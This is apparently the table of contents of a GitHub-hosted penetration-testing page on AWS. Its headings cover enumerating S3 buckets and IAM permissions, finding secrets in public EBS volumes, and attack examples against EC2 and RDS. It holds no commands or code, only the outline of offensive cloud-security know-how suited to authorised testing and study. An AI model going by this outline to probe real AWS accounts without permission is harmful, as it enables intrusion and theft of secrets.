Edit on GitHub
Contents
AWS basic info
Find AWS in domain/company
AIO AWS tools
S3
Basic Commands
Find S3 buckets
Check S3 buckets perms and files
S3 examples attacks
Enumerate read access buckets script
IAM
Basic commands
Tools
AWS IAM Cli Enumeration
EBS
Find secrets in public EBS
EBS attack example
EC2
EC2 basic commands
EC2 example attacks
Tools
Cloudfront
Info
Tools
AWS Lambda
Info
Tools
AWS Inspector
AWS RDS
Basic
Attacks
ECR
Info
Tools
ECS
Info
AWS Cognito API
AWS Systems Manager
Aws Services Summary
AWS vs AD